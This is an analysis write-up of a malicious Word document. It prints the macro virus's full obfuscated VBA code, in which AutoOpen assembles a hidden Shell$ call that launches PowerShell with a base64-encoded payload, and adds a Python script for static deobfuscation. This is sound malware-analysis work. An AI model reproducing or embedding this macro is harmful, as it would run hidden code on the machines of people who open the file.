[Macro Virus] A Simple Analysis of a Word Macro Virus
Preface
Recently I have become interested in Office macro viruses, so I found a Word sample online to practise on. The usual tricks a macro virus uses are to download a PE file from a server with PowerShell and run it, or to embed the PE file in a data stream and drop and run it via RTF.
So analysing a macro virus is generally fairly simple: reading the VBA code basically tells you what the virus does. But if the functions, variables and strings in the code have all been obfuscated, the analysis becomes noticeably harder.
Detailed Analysis
Luring the user into enabling macro code
If content is enabled, the macro code runs. Let's first look at the data streams in the document.
Dump the macro code from the "DMSojZquJ" and "wAwJBjJQJ" streams. The code is heavily obfuscated, so we start the analysis from the "AutoOpen" subroutine.
'Attribute VB_Name = "wAwJBjJQJ"
Function RTUHFOzsK()
    SSIhYOGKB = BBqMNPjSw
    bkspY = Mid("zYsMfzXjUkZcWdEGwAVSztCl", 12, 1)
    pGHmjw = bkspY
    THZbsWKtF = GApwOicZH
    VEbORpJELT = Mid("w ULjXwAKAb", 2, 2)
    siCAq = VEbORpJELT
    HPhRfOHnm = TOvllapZt
    jpucp = Mid("dwOtbdJnhnCwfmAwZ qUwQ", 18, 2)
    aLAikTZzXH = jpucp
    fqalXfJAK = LCnHkoIcD
    VuuwVO = Mid("sXFWPUriJfKTpqQrVtOvwpYvPcmRpGfQk", 26, 2)
    FItfpaapu = VuuwVO
    OBbLUEjqi = KUOOIoowi
    FVvtMEG = Mid("HdAFDcAsATviDfWzFFzpaz pXJcWfwf", 23, 2)
    ajJRwS = FVvtMEG
    jVrCIfDvl = zLiGcJXbX
    ZrAYDPTq = Mid("iHOvIROFpzkqDsbh OWUdhlpCiwZMTtrODJzmwsH", 17, 2)
    jiAGQiQw = ZrAYDPTq
    SUWWCjAwf = vzuwToFbG
    jmtkTTkrF = Mid("wYuqqVtGZiJmAXAhOSuPBlkv ZpEnSjLlFJZnGcc", 24, 2)
    GcmZjTwn = jmtkTTkrF
    LMtwHYSki = ADrFrhRWc
    NEiTwbDXjd = Mid("ffAMXNhHaz tNilfGXhcTPPsBKcvGidzFR", 11, 2)
    RjvFUJZEqEH = NEiTwbDXjd
    LKTKBJzHw = rAsqBBCLO
    riLqL = Mid("VYSzUNAfirLhNHuvTkkpqTYI NBTb", 25, 1)
    wjCNaFw = riLqL
    iVMwDRCAv = nqFMhzLtQ
    hCfFzWOivq = Mid("HRJzsdTznHRYYLErvnJSVjftUhUujlLVzZfA", 6, 1)
    NBOCDBCM = hCfFzWOivq
    nAKjzzabj = lKCqCjSmA
    bGAdVi = Mid("RMiPstNpOmmrqQf/wzkf", 16, 1)
    uFHPYHoifcS = bGAdVi
    PNGBIBOLR = tiTviHlPK
    BzbiCjnQqm = Mid("AikEQJtLfHomiYXDjK /fbjKtsWuJLaJzImkOi", 19, 2)
    IjUTlUqWHO = BzbiCjnQqm
    EuXMYbiQq = tznZtuwvj
    rZKmALU = Mid("ijpGMkvqVjf zj", 12, 2)
    uGUWvBHvsD = rZKmALU
    RTUHFOzsK = FItfpaapu + NBOCDBCM + IjUTlUqWHO + GcmZjTwn + uFHPYHoifcS + pGHmjw + jiAGQiQw + RjvFUJZEqEH + siCAq + uGUWvBHvsD + ajJRwS + aLAikTZzXH + wjCNaFw
End Function
Sub AutoOpen()
    KlsJVlijz
End Sub
'Attribute VB_Name = "DMSojZquJ"
Function KlsJVlijz()
    KRwZOZiSb = jMiOqzLkc
    TzurouRwtt = Mid("juDEAMQA2AGIANQA5LfDuHPHXHoVdEQfRC", 3, 15)
    iKnPNTjHYUN = TzurouRwtt
    TsfRjzdCc = wGUKHjjwm
    SAIGYDAjD = Mid("Ur8BJGqnnB5Yulset %cDpiTrLVN%=wers&&set %SuZmiriSa%=JwsADfCTs&&set %KlsJVlijz%=po&&set %qfSAwAXEM%=MrqzTiJDT&&set %PqjuFnVOr%=hell&&set %SqYwAARBW%=VcQFWjpkv&&!%KlsJVlijz%!!ZVnlC9iQvRBa", 15, 159)
    iBSRmkhEj = SAIGYDAjD
    XtczUhZho = sGlQtlEVs
    HdFRsCmu = Mid("zQDZhA3kAOQB7ADEAMQA2AGIAMQAwADUAYgAxADEAMQA6ADEAMQAwAFkANAA2AH4AMQAwADAMuwW3nHiNYrXXhKvuQhjarIPjtM", 8, 65)
    JZJjMfIbBG = HdFRsCmu
    PthzvLzhL = GZEufrNor
    aJFENXB = Mid("2iwApzVhvrZAEkAMQAxADEAegA0ADYAbQAxADEAMAAmADEAMAA4AH4ANAA3AHsAMQAxADYAYgA2ADYAJgAxADAAMgB+ADQANwBZADMAOQB+ADQANgB6ADgAMwBiADEAMQAyAH4AMQAwADgAWQAxADAANQBZADEAMQA2A2kjDuduJutzG4DjSWdJO2f", 12, 153)
    TjXFztBK = aJFENXB
    zUYzrCIlv = qfMjGmrTF
    bEHOc = Mid("LnMwj8vivvwTnBW06hAzADIASQAxADEAMABZADEAMAAxACEAMQAxADkAJgA0ADUAJgAxADEAMQB6ADkAHc", 19, 62)
    AcOZjKGHd = bEHOc
    EYzRCmWTI = kzbtDFuEB
    KtWFTJiUI = Mid("flGAbQ8jdVC6Iw5wGU3kFwCpYhBY7ADkAOAA6ADEAMAA2AG0AMQAwADXlAW41AL0oV", 29, 27)
    RkSMsXZmbbj = KtWFTJiUI
    TSBfqKPHC = wXTSDLmIQ
    iBobiw = Mid("QSw3OIaCMAwAHsAMQAxADAAOgAxADAAMQAmADEAMQA2AGIANAA2ACEAMQAwADAAOgAxADAAMQBiADQANwAmADEAMQA0AEkANAA3AH4ANAA0AHoAMQAwADQAbQAxADEANgBZADEAMQA2ACYAMQAxADIAfgA1ADgAewA0ADcAJgA0ADcAYgAxADAAPzfNmjW9Ai0vDzhN", 10, 174)
    mvotcU = iBobiw
    uiSlbYuXn = TwcHoBkXB
    iaBTlajaUKt = Mid("znY7zKn7hBOVIFz6X%cDpiTrLVN%!!%PqjuFnVOr%! -e LgAgACgAKAB2AEEAUgBpAEEAYgBMAGUAIAAnACoAbQBEAFIAKgAnACkALgBuAGEAbQBFAFsAMwAsADEAMQAsADIAXQAtAEoATwBJAG4AJwAnACkAIAAoACgAJwAzADYAOgAxADEAKvzcsdT8J0IO4j3RzW", 18, 165)
    XvLAfRK = iaBTlajaUKt
    EZhmBvkXw = pStPHvpAV
    wLTmWqsTK = Mid("FfAHsAMQAwADUAYgAxADEANQBZADEAMQA2AH4AMQAxADQAbQTLWzcjuipSiEo", 3, 46)
    orwEYmMBR = wLTmWqsTK
    jhqckTXvK = ZriRhfKhi
    wdpalVvA = Mid("I6iEVXN1GLwpHCz8Ijwm06KbVIuAJgAxADAAMQBJADQANwAhADcAOAB7ADgAOQAhADEAMAA3AEkAOAAzAG0AMQAwADIAJgA0ADcAegA0ADQAJgAxADAANAB6ADEAMQA2AH4AMQAxADYAIQAxADEAMgB7ADUAOAB7A86V", 28, 134)
    nGmuz = wdpalVvA
    iHhXBDcFF = tDohRofBp
    IWIok = Mid("RjADIAJgA0ADMAbQAzADIAYgNG9GurhlHcLP2Co6oWzLFSwmkhv4ldioX", 3, 22)
    TBNjdzzzh = IWIok
    KbpOPFkKj = NXkOFaMGs
    AsoLI = Mid("fSiIEDACYAMwA2AG0AMQAxADQAbQA5ADcAegAxADEAMABiADEAMAAwACYAMQAxADEAegAxADAAOQAhADMAMgBJADYhjj3jjAuppqRGqKrh1T", 7, 82)
    FRdXUFElRa = AsoLI
    oLjmAfOds = VsZuljqAF
    ISYEi = Mid("BVjP8jiqhGziNiDAAOQBiADQANwBJADgAMwBiADEAMAA3ACYANgA1ADoAOAA1AFkANAA3AFkANAA0ACYAMQAwADQAegAxADEANgBiADEAMQA2ACYAMQAxADIAewA1ADgAJgA0ADcAegA0ADcAOgAxADAAOQBtADkANwAmADEAMQA0ACEAMQA3ztDPGPG38AW1vo", 15, 166)
    fizsQ = ISYEi
    tUscmqXOh = UfwOUKvrp
    mnbclQddw = Mid("iPPaU89tkLifQBor34HASQB+AHoAJwAgACkAIAB8ACAAJQB7ACgAIABbAEkAbgB0AF0AJABfAC0AYQBTACAAWwBDAEgAYQByAF0AKQdQsE", 20, 83)
    cslql = mnbclQddw
    JXbJzlNOS = GTmEXEUTm
    GbEiUOiVXw = Mid("ziITYGiIamHpoZHgB+ADgAMwB7ADEAM1t26K9TjQqMzHzEYiu", 16, 16)
    YhuVfBw = GbEiUOiVXw
    AMYpPlzuw = tHXOwuqjd
    nwTYnBKp = Mid("I3DEAMAAx6EkAh4h7va", 3, 7)
    zwsMjwQJTv = nwTYnBKp
    djUGOYYRv = vPHtuBYvi
    WrfmRXK = Mid("Jmcs93jA5rYAMQBJADMAMgB6ADEAMQAwACYAMQAwADEAIQAxADEAOQAmADQANQAmADEAMQAxAH4AOQA4AFkAMQAwADYAYgAxADAAMQAhADkAOQBtADEAMQA2AHoAMwAyAEkAMQAxADQAegA5ADcAegAxADEAMAB6ADEAMAAwACYAMQAxADEAbQAxADAAOQnXaIM1vNmldkDIh7a0o14pDA1", 11, 180)
    awBiLS = WrfmRXK
    QTIqMFnTG = urVrNrbqk
    fwizQHrrKMl = Mid("7ZNCDjkd16F3vJwZADEAMAAxAG0AMQAwADkAYgA0ADYASQA3ADgAWQAxADAAMQA6ADEAMQA2AGIANAA2AGIAOAA3AH4AMQAwADEASQA5ADgAbQA2ADcAYgAxADAAOABJADEAMAA1ADoAMQAwADEAIQAxADEAMAAhARCJQsQwQniZ8zwzvDiFtJcuY", 16, 146)
    kzLPNEjwRpi = fwizQHrrKMl
    StzAQwpCi = qzNWqCPaM
    HYhqTVjz = Mid("NlUNOMQB7ADQANwAhADEAMQA4AHsAOAA3AG0AMQAwADMAOgA0ADcAbQA0ADQAJgAxADAANAAhADEAMQA2AG0AMQAxADYAewAxADEAMgBiADUAOAAhADQANwBiADQANwAmADkANwB6ADEAMAAwAFkAMQAwADkAegAxADAANQA6ADEAMQAwBwOoLDMXi", 6, 172)
    OXrPUEbnvR = HYhqTVjz
    UnXOTvRiZ = ZDBQRDQGC
    aOmzViYRI = Mid("q4zoiVLRd4XVFkAFkAOQA5ACEAOQA3AHoAMQAxADYAfgA5ADkAfgAxADAANABiADEAMgAzACEAMQAxADkAfgAxADEAI71o4", 15, 76)
    KIwkY = aOmzViYRI
    jQCKAJbwT = tXBTbniGD
    mTTdkG = Mid("09MYoVDXOQBiADEAMgAxAH4AOQA4AFkAMQAxADcAewAxADIAMQB+ADEAMAA1AG0AMQAxADAAegAxADAAMwBJADkANwB6ADEAMAAzAHoAMQAwADEAOgAxADEAMAA6ADEAMQA2ACYANAA2AG0AOQA5AFkAMQAxADEAbQAxAMzqwVf3OVmsh", 9, 157)
    CPOtaunKXFw = mTTdkG
    MDaCimYPz = cahKFjzjJ
    jENmKtocosG = Mid("Om2EAOgA5ADkAbQAxADEANgBiADMAMgBiADQANQAhADYANwBJADEAMQAxACYAMQAwADkAbQA3ADkAOgA5ADgAfgAxADAANgBiADEAMAAxAFkAOQA5AEkAMQAxADYAbQAzADIAfgA4ADcAYgA4ADMAJgA5ADkAbQAxA2XiEjooSHSSnosszbWhUJuvY0pR", 4, 159)
    IAFUul = jENmKtocosG
    KKmNnWbYG = XGbNmLAEC
    wwuaTvRloii = Mid("rizBpdohTDQANwBiADQANwAmADEAMAAxAFkAMQAwADAAYgAxADEAMQB7ADEAMQqMh4QsW0tSwB7NpOpYfO", 10, 53)
    muHlMzvW = wwuaTvRloii
    cihQlkKwW = mjSSTsdUv
    NkhKkqUcZzS = Mid("3sTuj9MB568wAFkANgA4AHoAMQAxADEASQAxADEAOQAhADEAMQAwACEAMQAwADgAWQAxADEAMQA6ADkANwBiADEAMAAwAFkANwAwACYAMQAwADUAOgAxADAAOAAhADEAMAAxAEkANAAwAG0AMwA2ACEAMQAxADcAYgAxADEA9u95c", 13, 156)
    wJLOSQhR = NkhKkqUcZzS
    QzQDbKjBI = XPoWJBjXF
    fYzIS = Mid("t8Qv5AEmsBzcKQuRLtPfWP2haoJiOWTEJKWZADUAYgAxADEAMABZADMAMgAmADMANgA6ADEAMQA3AH4AMQAxADQAfgAxADAAOAB7ADEAMQA1ACYANAAxAFkAMQAyADMAYgAxADEANgBJADEAMQA0AH4AMQAyADEAfgz0", 37, 126)
    bbvLjLAvSJ = fYzIS
    ctZCDozpo = oFnijRPjE
    ZXRkXlUKciC = Mid("K3jBHqR0qD19138PwR5IMndSACWcuccASQAxADAAMwB+ADEAMAAxAHoAMQAxADAAfgAxADEANgAmADEAMQA1AEkAMQAwADUAOgAxADEAMABJADkANwBtADzEX", 31, 88)
    LPwcEG = ZXRkXlUKciC
    mYCWkjbmj = iPZQlvnBa
    CaTTBtvHd = Mid("fNzJ623CmpME4BTWDGQSANQAzAHsANQAzAFkANQAxAUXUX", 21, 22)
    fcjRIRH = CaTTBtvHd
    WOvbEmVrw = VofWHZwuw
    JozUMVXQNC = Mid("IUU0INAxAH4AMQAxADUASQAxADEANQA6ADMAMgAmADMANgAmADEAMQAyAGIAOQA3AHsAMQAxADYASQAxADAANAB+ADUAOQAhADkAOAB7ADEAMQA0AGIAMQAwADEAOgA5ADcAWQAxADAANwB7ADUAOQB+ADEAMgA13K5AY50SzPat2", 7, 154)
    fhXwGUGo = JozUMVXQNC
    CFJqaQFQZ = PYTsvirtV
    dnCicIqnDi = Mid("0GrwGzcA1BiqDQ2HsANAAwAHsAMwA5AH4ANAA0AG0AMwA5AEkANAAxACEANQA5AG0AMwA2ACEAMQAxADAAjNwtq8wXSXLbhwY25YY", 16, 67)
    HczVFWDHVzj = dnCicIqnDi
    JKUQBsnGw = DMHzTrwkw
    ckRwBHp = Mid("66II1QkGmQO0bkrwXG7UDHLdjDEAMAAmADkANwB6ADEAMAA5ADoAMQAwADEAegAzMiwv58sW2z8", 26, 39)
    lbjqdjR = ckRwBHp
    QjnfWnMGT = cctziOEnj
    nRJpoij = Mid("JwuGuPV1D5MOLRcplDEAMQAwAGIANAA2AGIAMQAwADAAYgAxADAAFm3RsjWO", 18, 35)
    SPEOqDL = nRJpoij
    imEQCTSBE = SPEcvKlaM
    zGITmmFi = Mid("nXkCVcOVDCIGIANQA0ACEANAAxAHsANQA5AFkAMwA2AG0AMQAxADIAOgA5ADcAewAxADEANgBJADEAMAA0AHoAMwAyAEkANgAxAG0AMwAyAHoAMwA2AFkAMQAwADEAWQAxADEAMAB6ADEAMQA4AFkANQA4AG0AMQAxADYAIQAxADAAMQAmrEv", 12, 167)
    rBTCHaK = zGITmmFi
    hdnhDuYKd = FGitvjHSw
    tkqnlH = Mid("wdHfrVfjbwADcAOgAxADEANwB7ADEAMQA1ACYANAA1AHoAMQAwADIAYgAxADAAOAB6ADEAMAAxAH4AMQAwADUAWQAxADEANQBZADkAOQAhADEAMAA0AH4AMQAwADkAYgA5ADcAYgAxADEAMAB6A11BH3wMoDE4SIlE", 10, 138)
    ScIOzQwUMHj = tkqnlH
    szdUNVjur = PzhiLEBWJ
    wzamU = Mid("whNAB6ADEAMAA4AGIANAA2AG0AOAA0AGIAMQAxADEAfgA4ADMAegAxADEANgBiADEAMQA0AG0AMQAwADUAbQAxADEAMAA6ADEAMAAzACEANAAwAG0ANAAxAHoANAA0AHoAMwAyACEAMwA2AG0A4vOqBUdaq1qn1thchE", 3, 144)
    MthJuYP = wzamU
    vziJsrqMu = WYTXVcMta
    cqwMU = Mid("QjnkEoQif0vzwRUpzj9DcrA5AH4AMQAxADQAWQAxADAANQB+ADEAMQAyACEAMQAxADYAOgAzADIAWQA2ADEAbQAzADIAWQAxADEAMAAhADEAMAAxADoAMQAxADkAYgA0ADUAIQAxADEAMQBU0ntYjnSDmq5K", 23, 121)
    EbUQjFzQMji = cqwMU
    jNQSzJDJL = wWvdrZWLV
    OfVqJ = Mid("TiRt3HNPcKQFXzYzD5zBEbGwegA5ADcAIQAxADAAOQA6ADEAMAAxACYAMwAyAH4ANgAxAFkAMwAyAH4AMwA2AH4AYQhknD2", 25, 64)
    hpdwFmXNaN = OfVqJ
    PiHliAaNV = XriEVRdSI
    IwiDSbtjXNM = Mid("HqijWfnLLYUcpowUZTMNFWFwA2ADEAbQX2fLZc1w1PPk7JVF", 24, 9)
    LJIEujI = IwiDSbtjXNM
    sdzZGijtp = zshuBJHwL
    XNpKBSQp = Mid("kf6rX0J0wo7sLii6ADEAMQAxAH4AMQAxADAAJgA0ADYAWQA3ADcAYgAxADAAMQB7ADEAMQA1AFkAMQAxADUAegJ2BQk9m", 16, 71)
    LPjrKRijIw = XNpKBSQp
    SzjQrknfR = jrBdAZQdi
    jwrGYdkzCNC = Mid("AtDEANABZADEAMAA1ADoAMQAxADIAIQAxADEANgAmADQAN6f6zpUDiWd", 3, 44)
    EzTYX = jwrGYdkzCNC
    WqbZFkKbV = ncqVzZGKU
    CmzXsmGKojc = Mid("rTCDYRjjiCNAA6ADEAMAA1AH4AMQAxADYASQAxADAAMQB6ADQANQA6ADEAMAA0AGIAMQAxADEAIQAxADEANQBJADEAMQA2AEkAMwAyADoAMwA2AFkAOQA1ACYANAA2AEkANgA5ACYAMQAyADAAfgA5ADkAbQAxADAAMQB+ADEAMQAyAH4AMQAxADYAYgAxADAANQBulOPH", 11, 187)
    QYpwllzTSck = CmzXsmGKojc
    ZclPlaQAC = oWrIiXalF
    mAwtjzQ = Mid("dkAOgAxADAAOAA6ADEAMAA1ACEAMQAwADEAOgAxADEAMABZADEAMQA2AFkANAA2uJOYi2zO48HmdXNomG2zwpfcShY3M2zJnYLB", 2, 62)
    ZbAAifkPrvN = mAwtjzQ
    jtszGQPAD = bKtbWpErB
    oWJLO = Mid("i3TbIXnBQGAxADIAMwBZADMANgB+ADEAMQA5ACYAMQAwADEAegA5ADgAegA5ADjWE", 11, 52)
    DGLkaA = oWJLO
    zHFAIEhVF = dfwTvMTXR
    EKYFiRhEXFw = Mid("KnNUzlTmADEAMAAwADoAMQAxADEAJgAxADAAOQA6ADQANgB7ADEAMQAwADoAMQAwADEAegAxADIAMABJADEAMQA2AH4ANAAwAG0ANAA5AFkANAA0AFkAMwAyACYANQA0AG00PriiWvtTcTzBJm2tJ1j", 8, 124)
    zSGEI = EKYFiRhEXFw
    cZWVzlXoq = JMzCDmWdd
    SFdjwWp = Mid("zPHvKMQAxADIASQA5ADcAWQAxADEANgBiADEAMAA0ACEANAAxACEANQA5AHoAOAAzADoAMQAxADYASQA5ADcASQAxADEANAA6ADEAMQA2AHoANAA1AGIAOAAwAFkAMQAxADQAYgAxADEAMQAhADkAOQBJADEAMA9pqIbizJibVUjF5C", 6, 154)
    OkBajT = SFdjwWp
    ziknRkKlU = EIPhIwXbR
    DcABZPAtp = Mid("Ph4HGzYkfOCGqZiwdDGa3TvRI46jLtBiSAzADkAIQA0ADYAIQAxADAAMQA6ADEAMgAwAHsAMQAwADEAJgAzADkAfgA1ADkAfgAxADAAMgA6ADEAMQAxACEAMQAxADQAegAxADAAMQAmADkANwB+ADkAOQA6ADEAMAA0AGIANAAwACYAMwA2AG0AMQAxADcAIQAxADEANABZADEAMAA4AEkAMwAyAH4AMQAwPn59", 34, 194)
    CWMpLVkSS = DcABZPAtp
    ibHUdTOYI = FabLwRiUp
    cBUrWQJBDX = Mid("XmOJgAxADAAOAA6ADEAMQA1AGIzN3QzjhpYQj5G3IKoCPMI", 4, 23)
    lcPiAkbq = cBUrWQJBDX
    hpIlKOQSj = bbEBfbVrB
    MvpXHXC = Mid("z5nzXvB8SLdaMXOJ2AMwAyAEkANgAxACYAMwAyAGIAMwA5ACYAMQAwADQAWQAxADEANgB+ADEAMQA2AEkAMQAxADIAJgA1ADgAYgA0ADcAJgA0ADcAbQA5ADSC", 18, 103)
    HnZjzd = MvpXHXC
    WiEQYtbFL = stLzwnJqm
    vajVOP = Mid("RGKthsDsJzwtA5ADcAYgAxADAAMwBJADEAMAAxAHsANQA5AFkAMQAyADUAfgAxADIANQAnAC4AcwBQAEwAaQBUACgAIAAnAFkAJgB7AG0AOgBiACE8UDpdPzMzSYXt3P57", 13, 101)
    GzjkYUBnqXG = vajVOP
    JtQsEKnnw = DEvzqFPLp
    kEROiFMIq = Mid("j4Ja9dOW453qN2YADEAMAA5AEkZA0c3hwNX3JwzjtcQXbvF6aP", 16, 11)
    icAYwsLVpUA = kEROiFMIq
    kQQOJFDXZ = UddQropLw
    irUIcwRD = Mid("Au1EHs6ti0AmADUAOQB6ADMANgAmADEAMQA3AHsAMQAxADQA7Wj9C5z0PqNsb2IoN9LTqN", 11, 38)
    bapZdDJB = irUIcwRD
    kdaudlwYB = PtDFhmwZZ
    iFmWVaPu = Mid("AX2dCwbGzBwRzR0B9ACAAKQAtAEoATwBpAG4AJwAnACAAKQA=57cAXn5i8m8q2JvPWDXAo", 16, 34)
    KbFniuHlZAr = iFmWVaPu
    WujLpjlSJ = TnMGKiHih
    hfcbdZkXOQ = Mid("MofaM2kwYCF3hI3pREPq5wADEAWQA5ADkAhBAoZ3SX", 22, 13)
    OWGLMOBo = hfcbdZkXOQ
    OpniRlEni = VOwqRSPSQ
    zXXPDkaDCDf = Mid("UMBH8K03MAPWjNr4AA0AHsAMQAwADEAYgAxADAAOAB+ADEAMAA4AGIANQA5ACYAMwA2ACEAMQAxADkAegAxADAAMQBZADkAOAAmADkAOQB6ADEAMAA4AEkAMQAwADUAewAxADAAMQBZADEAMQAwADoAMQAxADYAWQAzADIAejavu33", 17, 152)
    iCUMSYusIv = zXXPDkaDCDf
    OZouIKbdk = oJiYwCEkj
    pDDDLci = Mid("5l8w3MoVMQAxADQAOgA5ADcAegAxADEAMAArVwfzX20rok3a", 9, 27)
    NwSKajzAjmw = pDDDLci
    lrczHCBPD = NcVurrNsF
    cYFmodmUji = Mid("Xr8i8vwXK63tEGUAFM4fpIlA5ADcASQAxADEANgB7ADEAMAA1AGIAMQAwADEAIQAxADAANwBtADkANwBZADEAMQAwACYAMQAxADYASQAxADEAMQBiADEAMQAxAG0AMQAxADQAWQA5ADkAewAxADAAOAB+Ar2UuHBTQ", 24, 131)
    kKRBFkTYOSq = cYFmodmUji
    tThcDoAPi = vzQtlhidb
    FPmzKLZZjn = Mid("UZV2SLzYBcmKjhjOAB7ADEAMAA2ADoAMQAuW61n", 16, 19)
    bYcfSuOhsf = FPmzKLZZjn
    nRRltsHOB = PtSrLGzLR
    KftEZiGv = Mid("ZOQB6ADEAMQA1AG0AOQGqcXPjVTGBVwHur", 2, 18)
    PcapUM = KftEZiGv
    CIoowrYFS = nUqoLNQZb
    CfjsS = Mid("pZPkhRPZtdoEjR3UWRwYAMQAxADIAWQAzADIAegA0ADMAegAzADIAbQAzADkASQA5ADIAegAzADkAIQAzADIAYgA0ADMAOgAzADIAJgAzADYAYgAxAoA", 21, 94)
    sbpNlLMLdC = CfjsS
    nHaoVpmlW = MEmKwaQjV
    haGppvzwpLm = Mid("MWhOm3Q1WQAxADEANgB+ADMAMgB7ADgAMwBJADEAMgAxAHsAMQAxADUASQAxADEANgB7v", 9, 59)
    wZkHuAqmza = haGppvzwpLm
    Shell$ RTUHFOzsK + Chr(34) + iBSRmkhEj + XvLAfRK + PcapUM + EbUQjFzQMji + RkSMsXZmbbj + IAFUul + EzTYX + YhuVfBw + iCUMSYusIv + LJIEujI + AcOZjKGHd + bYcfSuOhsf + OWGLMOBo + wZkHuAqmza + kzLPNEjwRpi + iKnPNTjHYUN + FRdXUFElRa + awBiLS + bapZdDJB + lcPiAkbq + HnZjzd + LPwcEG + JZJjMfIbBG + nGmuz + muHlMzvW + mvotcU + CPOtaunKXFw + fizsQ + ScIOzQwUMHj + SPEOqDL + OXrPUEbnvR + orwEYmMBR + kKRBFkTYOSq + zwsMjwQJTv + TjXFztBK + HczVFWDHVzj + hpdwFmXNaN + NwSKajzAjmw + zSGEI + fcjRIRH + rBTCHaK + icAYwsLVpUA + sbpNlLMLdC + lbjqdjR + TBNjdzzzh + CWMpLVkSS + bbvLjLAvSJ + DGLkaA + ZbAAifkPrvN + wJLOSQhR + MthJuYP + OkBajT + fhXwGUGo + KIwkY + QYpwllzTSck + LPjrKRijIw + GzjkYUBnqXG + cslql + KbFniuHlZAr, 0
End Function
The subroutine first calls the "KlsJVlijz" function in the "DMSojZquJ" module. That function's code is heavily obfuscated too, but the "Shell" keyword at the end of it tells us the virus is launching some program or command line.
' The window-style argument 0 hides the launched program or command line
Shell$ RTUHFOzsK + Chr(34) + iBSRmkhEj + XvLAfRK + PcapUM + EbUQjFzQMji + RkSMsXZmbbj + IAFUul + EzTYX + YhuVfBw + iCUMSYusIv + LJIEujI + AcOZjKGHd + bYcfSuOhsf + OWGLMOBo + wZkHuAqmza + kzLPNEjwRpi + iKnPNTjHYUN + FRdXUFElRa + awBiLS + bapZdDJB + lcPiAkbq + HnZjzd + LPwcEG + JZJjMfIbBG + nGmuz + muHlMzvW + mvotcU + CPOtaunKXFw + fizsQ + ScIOzQwUMHj + SPEOqDL + OXrPUEbnvR + orwEYmMBR + kKRBFkTYOSq + zwsMjwQJTv + TjXFztBK + HczVFWDHVzj + hpdwFmXNaN + NwSKajzAjmw + zSGEI + fcjRIRH + rBTCHaK + icAYwsLVpUA + sbpNlLMLdC + lbjqdjR + TBNjdzzzh + CWMpLVkSS + bbvLjLAvSJ + DGLkaA + ZbAAifkPrvN + wJLOSQhR + MthJuYP + OkBajT + fhXwGUGo + KIwkY + QYpwllzTSck + LPjrKRijIw + GzjkYUBnqXG + cslql + KbFniuHlZAr, 0
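The Shell$ argument can also be recovered without running the macro at all: every real fragment is a Mid() slice out of a longer decoy string, the junk lines only copy one uninitialised variable into another, and the final expression just joins named fragments and Chr(34) quotes. The Python script below is an added example, not part of the original post or of the sample, that evaluates exactly that pattern statically. It is run here on a constructed VBA fragment (SAMPLE_VBA, with made-up names and decoy strings) that copies the sample's structure; to use it on the real modules, paste the dumped code of wAwJBjJQJ followed by DMSojZquJ into one string so that RTUHFOzsK is defined before KlsJVlijz references it.

```python
import re

# Constructed VBA fragment (not the sample's own code) that copies the pattern
# seen in the macro: junk assignments between the real ones, every real
# fragment produced by Mid() on a longer decoy string, fragments aliased and
# then concatenated into a single Shell$ call whose window-style argument is 0.
SAMPLE_VBA = '''
'Attribute VB_Name = "ModuleA"
Function BuildCmd()
    KkQzRt = PqLmNo
    aA = Mid("zzcmd /q", 3, 4)
    bB = Mid("A/c Bx", 2, 3)
    WwEeRr = TtYyUu
    BuildCmd = aA + bB
End Function
'Attribute VB_Name = "ModuleB"
Sub AutoOpen()
    QrTsVb = WvXbZa
    cC = Mid("xxecho okyy", 3, 7)
    dD = cC
    Shell$ BuildCmd + Chr(34) + dD + Chr(34), 0
End Sub
'''

ASSIGN_RE = re.compile(r'^\s*([A-Za-z_]\w*)\s*=\s*(.*?)\s*$')
SHELL_RE = re.compile(r'^\s*Shell\$?\s+(.*),\s*(\d+)\s*$')
TERM_RE = re.compile(
    r'Chr\((\d+)\)'                            # Chr(n)
    r'|Mid\("([^"]*)",\s*(\d+),\s*(\d+)\)'    # Mid("s", start, len), 1-based
    r'|([A-Za-z_]\w*)'                         # variable or function name
)


def vba_mid(s: str, start: int, length: int) -> str:
    """VBA Mid(): 1-based start, clipped to the string end like VBA does."""
    return s[start - 1:start - 1 + length]


def eval_expr(expr: str, env: dict) -> str:
    """Evaluate a '+' concatenation of Chr(), Mid() and names statically.
    A name that was never given a string is a junk variable; VBA treats an
    uninitialised Variant as "" in string concatenation, so we do the same."""
    out = []
    for m in TERM_RE.finditer(expr):
        chr_n, mid_s, mid_start, mid_len, name = m.groups()
        if chr_n is not None:
            out.append(chr(int(chr_n)))
        elif mid_s is not None:
            out.append(vba_mid(mid_s, int(mid_start), int(mid_len)))
        else:
            out.append(env.get(name, ''))
    return ''.join(out)


def extract_shell_commands(vba: str) -> list:
    """Walk the module(s) top to bottom with one variable environment
    (a 'FuncName = expr' line is the function's return value, so a later
    module can reference it by name) and collect every Shell$ target
    together with its window-style argument."""
    env = {}
    found = []
    for line in vba.splitlines():
        stripped = line.strip()
        if not stripped or stripped.startswith("'"):
            continue                      # blank line or 'Attribute comment
        m = SHELL_RE.match(line)
        if m:
            found.append((eval_expr(m.group(1), env), int(m.group(2))))
            continue
        m = ASSIGN_RE.match(line)
        if m:
            env[m.group(1)] = eval_expr(m.group(2), env)
    return found


if __name__ == '__main__':
    for cmd, style in extract_shell_commands(SAMPLE_VBA):
        print(f'Shell (window style {style}): {cmd}')
```

An unassigned name resolves to an empty string, which is what VBA does with an uninitialised Variant in string concatenation; that is why decoy lines such as SSIhYOGKB = BBqMNPjSw contribute nothing to the result. The window-style value is returned alongside the command so that a 0 (vbHide) stands out in the output.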
We modify the code and use the MsgBox function to display what gets executed.
It turns out that cmd is used to invoke PowerShell and run the command.
' Assembling the string "powershell"
set %cDpiTrLVN%=wers          ' assigns "wers"
&&set %SuZmiriSa%=JwsADfCTs   ' junk (obfuscation)
&&set %KlsJVlijz%=po          ' assigns "po"
&&set %qfSAwAXEM%=MrqzTiJDT   ' junk (obfuscation)
&&set %PqjuFnVOr%=hell        ' assigns "hell"
&&set %SqYwAARBW%=VcQFWjpkv   ' junk (obfuscation)
&&!%KlsJVlijz%!               ' appends "po"
!%cDpiTrLVN%!                 ' appends "wers"
!%PqjuFnVOr%!                 ' appends "hell"
Base64-decode the PowerShell command.
The decoded data is obfuscated as well. The deobfuscation method is to strip the useless strings and convert the decimal values to their corresponding ASCII characters.
Because the 3, 11 and 2 on the first line are non-printable once converted to ASCII, we start from the 36 on the second line, and so on.
